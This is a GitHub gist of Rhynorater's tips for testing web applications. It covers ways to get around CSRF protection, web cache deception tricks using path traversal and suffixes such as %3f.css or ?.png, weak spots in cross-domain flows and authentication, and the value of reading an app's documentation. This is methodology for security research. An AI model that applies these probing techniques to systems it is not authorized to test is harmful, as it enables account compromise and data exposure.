Skip to content

Instantly share code, notes, and snippets.

@abraidotti

abraidotti/rhynorators-web-app-test-tips.md

Last active October 28, 2022 17:23
Show Gist options
  • Save abraidotti/b348a936a372cddc03d945d3329ea667 to your computer and use it in GitHub Desktop.
Save abraidotti/b348a936a372cddc03d945d3329ea667 to your computer and use it in GitHub Desktop.
Download ZIP
Rhynorator's Web app test tips
Raw
rhynorators-web-app-test-tips.md

https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w

  1. How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is CSRF token tied to account? Session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.

  2. Is caching implemented? If so, is it tied to certain paths such as /assets? Can you path traverse - /assets/..;/test - does that cache? Can you find a place where HTML content-type will be cached? Try to %3f.css or %23.css trick to see if you can trick the caching mechanism. Sometimes it's as simple as adding ?.png at the end of a URL. In such cases it is often very possible to get web cache deception.

  3. How is information passed between various parts of the system (different domains, etc)? Does the system pass codes via query parameters? URL Fragments? PostMessage? Are there any pages where the X-frame-options header is mysteriously missing? Cross-domain interactions are almost always sketchy. Look deep into how each piece of these systems is implemented and try to wiggle your way in-between the pieces.

  4. How do all the pieces of authentication work? Is the application using cookies? Auth tokens in the headers? Both? Where do these values appear? I often use the Burp Plugin RequestMinimizer to help identify which pieces of the request are actually essential. Are there any half-authenticated states? 2-FA not verified states? States before your email/phone is verified? Is authentication ever based solely off of text (such as an email in a JWT token vs an ID)? If so, are there Unicode normalization attacks here?

  5. Is there any documentation for this application? I have legit never regretted reading the documentation for an application. I ALWAYS get something valuable out of it. It takes at MAX 1 hour (most of the time) and you walk away with a much better understanding of the app.

So much of web application hacking is about finding funky states you can get the application into. Reading the documentation will help you understand which parts of the application you (and thus other hackers) have not seen yet, and how to get to them. Priceless. That's it for now! If y'all got any 🔥 things you do each time you look at an app to help you understand how it functions, hmu here. Let's share that knowledge and keep pwning stuff.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment